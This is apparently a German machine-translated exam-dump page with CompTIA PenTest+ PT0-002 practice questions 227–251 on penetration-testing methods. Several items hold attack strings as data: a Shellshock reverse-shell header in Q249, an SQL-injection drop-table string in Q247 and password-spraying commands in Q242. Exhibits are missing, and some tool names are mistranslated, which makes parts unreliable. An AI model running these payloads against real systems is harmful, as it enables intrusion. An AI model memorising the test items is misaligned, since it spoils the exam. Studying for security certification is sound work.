100% PASS RATE CompTIA PenTest+ PT0-002 Certified Exam DUMP with 400 Questions [Q227-Q251] : Exams Labs Braindumps : http://blog.examslabs.com

Diese Seite wurde von Exams Labs Braindumps exportiert [ http://blog.examslabs.com ]
Export date: Thu Dec 26 17:50:24 2024 / +0000 GMT

100% PASS RATE CompTIA PenTest+ PT0-002 Certified Exam DUMP mit 400 Fragen [Q227-Q251]

100% PASS RATE CompTIA PenTest+ PT0-002 Certified Exam DUMP mit 400 Fragen

Updates für die neuesten PT0-002 Free Exam Study Guide!

Kandidaten für die CompTIA PT0-002-Prüfung sollten über ein solides Verständnis von Netzwerktechnologien, Betriebssystemen und Softwareentwicklung verfügen. Außerdem sollten sie über Kenntnisse der Grundsätze und Praktiken der Cybersicherheit verfügen. Kandidaten, die die CompTIA PT0-002-Prüfung bestehen, können sich einen Wettbewerbsvorteil auf dem Arbeitsmarkt verschaffen und potenziell höhere Gehälter erzielen.

FRAGE 227
Welches der folgenden Elemente eines Penetrationstestberichts zielt darauf ab, eine normalisierte und standardisierte Darstellung der entdeckten Schwachstellen und der Gesamtbedrohung, die sie für ein betroffenes System oder Netzwerk darstellen, zu liefern?

Kurzfassung

Schweregrad der Schwachstelle

Empfehlungen zur Schadensbegrenzung

Methodik

FRAGE 228
Ein Penetrationstester arbeitet mit einem neuen Kunden an einem Scoping-Dokument. Die vom Kunden verwendete Methodik umfasst Folgendes:
Interaktion im Vorfeld des Engagements (Scoping und ROE)
Nachrichtenbeschaffung (Aufklärung)
Modellierung von Bedrohungen
Analyse der Schwachstellen
Ausbeutung und Nachausbeutung
Berichterstattung
Welche der folgenden Methoden wendet der Kunde an?

OWASP-Leitfaden für Web-Sicherheitstests

Technische Leitlinien PTES

NIST SP 800-115

OSSTMM

FRAGE 229
Sie sind ein Penetrationstester, der Port-Scans auf einem Server durchführt.
ANLEITUNGEN
Teil 1: Konstruieren Sie anhand der Ausgabe den Befehl, mit dem diese Ausgabe erzeugt wurde, aus den verfügbaren Optionen.
Teil 2: Sobald der Befehl angemessen aufgebaut ist, verwenden Sie die gegebene Ausgabe, um die potenziellen Angriffsvektoren zu identifizieren, die weiter untersucht werden sollten.
Wenn Sie zu einem beliebigen Zeitpunkt den Ausgangszustand der Simulation wiederherstellen möchten, klicken Sie bitte auf die Schaltfläche Alles zurücksetzen.

FRAGE 230
Ein Penetrationstester sucht nach einer Schwachstelle, die es Angreifern ermöglicht, Türen über einen speziellen TCP-Dienst zu öffnen, der für ein physisches Zugangskontrollsystem verwendet wird. Der Dienst ist auf mehr als 100 verschiedenen Hosts vorhanden, so dass der Tester die Bewertung gerne automatisieren würde. Für die Identifizierung muss der Penetrationstester Folgendes tun:
Sie haben eine vollständige TCP-Verbindung
Senden einer "Hallo"-Nutzlast
Walt für eine Antwort
Senden einer Zeichenkette, die länger als 16 Bytes ist
Welcher der folgenden Ansätze würde das Ziel am BESTEN unterstützen?

Führen Sie nmap -Pn -sV -script vuln aus.

Führen Sie einen einfachen OpenVAS-Scan gegen den TCP-Port des Hosts durch.

Erstellen Sie ein Skript in der Sprache Lua und verwenden Sie es mit NSE.

Führen Sie mit Nessus eine Überprüfung mit Zugangsberechtigung durch.

FRAGE 231
Ein Penetrationstester führt eine Erkundung für eine Bewertung einer Webanwendung durch. Bei der Untersuchung überprüft der Tester die robots.txt-Datei auf interessante Elemente.
ANLEITUNGEN
Wählen Sie das Tool, das der Penetrationstester für die weitere Untersuchung verwenden soll.
Wählen Sie die beiden Einträge in der robots.txt-Datei aus, die der Penetrationstester zur Entfernung empfehlen soll.

FRAGE 232
Ein Penetrationstester möchte FTP-Zugangsdaten erhalten, indem er eine Workstation als On-Path-Angriff zwischen dem Ziel und dem Server mit dem FTP-Protokoll einsetzt. Welche der folgenden Methoden wäre die BESTE, um dieses Ziel zu erreichen?

Warten Sie auf die nächste Anmeldung und führen Sie einen Downgrade-Angriff auf den Server durch.

Erfassen Sie den Datenverkehr mit Wireshark.

Führen Sie einen Brute-Force-Angriff auf den Server durch.

Verwenden Sie einen FTP-Exploit gegen den Server.

FRAGE 233
Ein Penetrationstester erhält die folgenden Ergebnisse eines Nmap-Scans:

Welches der folgenden Betriebssysteme läuft am ehesten auf dem Zielsystem?

CentOS

Arch Linux

Windows-Server

Ubuntu

FRAGE 234
Ein Penetrationstester bereitet sich auf die Durchführung von Aktivitäten für einen Kunden vor, die nur eine minimale Störung des Unternehmensbetriebs erfordern. Welche der folgenden Methoden gelten als passive Aufklärungsmethoden? (Wählen Sie zwei.)

Wireshark

Nessus

Netzhaut

Rülps-Suite

Shodan

Nikto

FRAGE 235
Ein Penetrationstester gibt den folgenden Befehl aus, nachdem er eine Reverse-Shell mit geringen Rechten erhalten hat: wmic service get name,pathname,startmode Welcher der folgenden Gründe ist am wahrscheinlichsten, dass der Penetrationstester diesen Befehl ausgeführt hat?

So suchen Sie im Dienstverzeichnis nach Kennwörtern

So listen Sie geplante Aufgaben auf, die möglicherweise ausgenutzt werden können

So registrieren Sie einen Dienst für die Ausführung als System

So finden Sie Dienste, die nicht zitierte Dienstpfade haben

FRAGE 236
Die folgende Ausgabe stammt von der Erkundung einer öffentlich zugänglichen Banken-Website:

Welcher der folgenden Angriffe ist auf der Grundlage dieser Ergebnisse am wahrscheinlichsten erfolgreich?

Ein Geburtstagsangriff auf 64-Bit-Verschlüsselungen (Sweet32)

Ein Angriff, der die RC4-Verschlüsselung bricht

Ein Angriff auf eine Erweiterung für Sitzungstickets (Ticketbleed)

Ein Heartbleed-Angriff

FRAGE 237
Ein Penetrationstester nutzte Nmap, um den Host 64.13.134.52 zu scannen, und erhielt die folgenden Ergebnisse:

Welche der folgenden Dienste werden am ehesten ausgenutzt? (Wählen Sie zwei.)

Telnet

HTTP

SMTP

DNS

NTP

SNMP

FRAGE 238
Die Ergebnisse eines Nmap-Scans sehen wie folgt aus:

Welche der folgenden Aussagen ist die BESTE Schlussfolgerung zu diesem Gerät?

Dieses Gerät kann aufgrund der Art und Weise, wie Transaktionen über TCP/22 mit Heartbeat-Erweiterungspaketen umgehen, für den Heartbleed-Fehler anfällig sein, was es Angreifern ermöglicht, sensible Informationen aus dem Prozessspeicher zu erhalten.

Bei diesem Gerät handelt es sich höchstwahrscheinlich um ein Gateway mit In-Band-Management-Diensten.

Bei diesem Gerät handelt es sich höchstwahrscheinlich um einen Proxy-Server, der Anfragen über TCP/443 weiterleitet.

Dieses Gerät ist aufgrund einer Butterüberlaufschwachstelle in der Methode, mit der DNS-Namen vor der DNSSEC-Validierung aus Paketen extrahiert werden, möglicherweise für Remotecodeausführung anfällig.

FRAGE 239
Ein Penetrationstester, der einen Test einer Webanwendung durchführt, entdeckt eine Clickjacking-Schwachstelle im Zusammenhang mit einer Anmeldeseite für Finanzdaten. Welche der folgenden Maßnahmen sollte der Tester mit diesen Informationen ergreifen, um die Schwachstelle erfolgreich auszunutzen?

XSS durchführen.

Führen Sie einen Wasserloch-Angriff durch.

Verwenden Sie BeEF.

Verwenden Sie den Browser-Autopwn.

Erläuterung
Eine Clickjacking-Schwachstelle ermöglicht es einem Angreifer, einen Benutzer dazu zu verleiten, auf ein verstecktes Element auf einer Webseite zu klicken, z. B. eine Anmeldeschaltfläche oder einen Link. Ein Watering-Hole-Angriff ist eine Technik, bei der der Angreifer eine Website kompromittiert, die von den Zielnutzern häufig besucht wird, und bösartigen Code oder Inhalt in die Website einschleust.
Der Angreifer kann dann die Clickjacking-Schwachstelle nutzen, um die Benutzer auf eine bösartige Website umzuleiten oder nicht autorisierte Aktionen in ihrem Namen durchzuführen.
A: XSS durchführen. Dies ist falsch. XSS (Cross-Site-Scripting) ist eine Schwachstelle, bei der ein Angreifer bösartige Skripts in eine Webseite einschleust, die vom Browser des Opfers ausgeführt werden. XSS kann zum Stehlen von Cookies, Sitzungs-Tokens oder anderen sensiblen Informationen verwendet werden, steht aber nicht in direktem Zusammenhang mit Clickjacking.
C: Verwenden Sie BeEF. Dies ist falsch. BeEF (Browser Exploitation Framework) ist ein Tool, das es einem Angreifer ermöglicht, verschiedene Browser-Schwachstellen auszunutzen und die Kontrolle über den Browser des Opfers zu übernehmen. BeEF kann verwendet werden, um Clickjacking-Angriffe zu starten, aber es ist nicht die einzige Möglichkeit, dies zu tun.
D: Verwenden Sie die Browser-Autopwn-Funktion. Dies ist falsch. Browser-Autopwn ist eine Funktion von Metasploit, die automatisch Browser-Schwachstellen ausnutzt und eine Nutzlast an das System des Opfers sendet. Browser-Autopwn kann verwendet werden, um den Browser des Opfers zu kompromittieren, steht aber in keinem direkten Zusammenhang mit Clickjacking.
Referenzen:
1: OWASP Foundation, "Clickjacking", https://owasp.org/www-community/attacks/Clickjacking
2: PortSwigger, "Was ist Clickjacking? Tutorial & Beispiele",
https://portswigger.net/web-security/clickjacking
4: Akto, "Clickjacking: Schwachstellen, Angriffe und Prävention verstehen",
https://www.akto.io/blog/clickjacking-understanding-vulnerability-attacks-and-prevention

FRAGE 240
Welches der folgenden Tools kann ein Penetrationstester verwenden, um ein Benutzerpasswort über SSH mit mehreren Threads zu erzwingen?

CeWL

John the Ripper

Hashcat

Hydra

FRAGE 241
Ein Penetrationstester erhält die folgenden Ergebnisse eines Nmap-Scans:

Welches der folgenden Betriebssysteme läuft am ehesten auf dem Zielsystem?

CentOS

Arch Linux

Windows-Server

Ubuntu

FRAGE 242
Ein Penetrationstester möchte das Passwort für ein beliebiges Konto in der Domäne herausfinden, ohne eines der Konten zu sperren. Welchen der folgenden Befehle sollte der Prüfer verwenden?

enum4linux -u userl -p /passwordList.txt 192.168.0.1

enum4linux -u userl -p Passwortl 192.168.0.1

cme smb 192.168.0.0/24 -u /userList.txt -p /passwordList.txt

cme smb 192.168.0.0/24 -u /userList.txt -p Summer123

FRAGE 243
Einsatz eines Schwachstellen-Scanners in einem hybriden Netzwerksegment, das allgemeine IT-Server und industrielle Kontrollsysteme umfasst:

werden Schwachstellen im Modbus-Protokoll aufgedeckt.

kann zu unbeabsichtigten Ausfällen in Kontrollsystemen führen.

kann die Rate der tatsächlich positiven Befunde verringern.

zu einer Denial-of-Service-Situation in den IP-Netzen führt.

FRAGE 244
Ein Penetrationstester hat die folgende Phishing-E-Mail für einen bevorstehenden Penetrationstest vorbereitet:

Welche der folgenden Möglichkeiten nutzt der Penetrationstester am meisten, um Phishing-Zielpersonen zum Klicken auf den Link zu bewegen?

Vertrautheit und Ähnlichkeit

Autorität und Dringlichkeit

Knappheit und Angst

Sozialer Beweis und Gier

FRAGE 245
Ein Penetrationstester führt einen On-Path-Link-Layer-Angriff durch, um die Kontrolle über einen Schlüsselanhänger zu übernehmen, der ein Elektrofahrzeug steuert. Mit welchem der folgenden drahtlosen Angriffe könnte ein Penetrationstester einen erfolgreichen Angriff durchführen?

Bluejacking

Bluesnarfing

BLE-Angriff

WPS-PIN-Angriff

FRAGE 246
Nachdem ein Penetrationstester ein System kompromittiert hat, möchte er weitere Informationen erhalten, um zu entscheiden, welche Maßnahmen er als Nächstes ergreifen will. Der Prüfer führt die folgenden Befehle aus:

Welchen der folgenden Angriffe versucht der Penetrationstester am ehesten durchzuführen?

Angriff auf den Metadatendienst

Techniken zur Flucht aus Containern

Sammeln von Zugangsdaten

Erschöpfung der Ressourcen

FRAGE 247
Ein Penetrationstester führte eine Bewertung eines Webservers durch. Die Protokolle dieser Sitzung zeigen Folgendes:
http://www.thecompanydomain.com/servicestatus.php?serviceID=892&serviceID=892 ' ; DROP TABLE SERVICES; -
Welcher der folgenden Angriffe wird versucht?

Clickjacking

Session-Hijacking

Parameter Verschmutzung

Cookie-Hijacking

Website-übergreifendes Scripting

FRAGE 248
Während einer Prüfung konnte ein Penetrationstester mit einem Laptop, auf dem Aircrack-ng lief, von außerhalb des Gebäudes auf das drahtlose Netzwerk des Unternehmens zugreifen. Welche der folgenden Maßnahmen sollte dem Kunden empfohlen werden, um dieses Problem zu beheben?

Umstellung auf Wi-Fi-Geräte, die eine starke Verschlüsselung unterstützen

Verwendung von Richtantennen

Verwendung der WEP-Verschlüsselung

Deaktivieren von Wi-Fi

FRAGE 249
Ein Penetrationstester entdeckt einen verwundbaren Webserver unter 10.10.1.1. Der Tester bearbeitet dann ein Python-Skript, das einen Web-Exploit sendet, und stößt auf den folgenden Code:
exploits = {"User-Agent": "() { ignoriert;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} Welche der folgenden Änderungen sollte der Prüfer am Skript vornehmen, um den Benutzerkontext zu bestimmen, in dem der Server ausgeführt wird?

exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}

exploits = {"User-Agent": "() { ignoriert;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}

exploits = {"User-Agent": "() { ignoriert;};/bin/sh -i ps -ef" 0>&1″, "Accept": "text/html,application/xhtml+xml,application/xml"}

exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80″ 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}

FRAGE 250
Ein Penetrationstester entdeckt während der Erkundungsphase des Penetrationstests Passwörter in einer öffentlich zugänglichen Datenpanne. Welche der folgenden Maßnahmen sollte der Prüfer ergreifen?

Fügen Sie die Passwörter in einen Anhang des Penetrationstestberichts ein.

Tun Sie nichts. Die Verwendung von Passwörtern aus manipulierten Daten ist unethisch.

Kontaktieren Sie den Kunden und informieren Sie ihn über den Verstoß.

Verwenden Sie die Passwörter in einem Credential Stuffing-Angriff, wenn der externe Penetrationstest beginnt.

FRAGE 251
Sie sind ein Penetrationstester, der die Website eines Kunden über einen Webbrowser überprüft.
ANLEITUNGEN
Überprüfen Sie alle Komponenten der Website mit dem Browser, um festzustellen, ob Sicherheitslücken vorhanden sind.
Beheben Sie NUR die höchste Schwachstelle, entweder im Zertifikat, in der Quelle oder in den Cookies.
Wenn Sie zu einem beliebigen Zeitpunkt den Ausgangszustand der Simulation wiederherstellen möchten, klicken Sie bitte auf die Schaltfläche Alles zurücksetzen.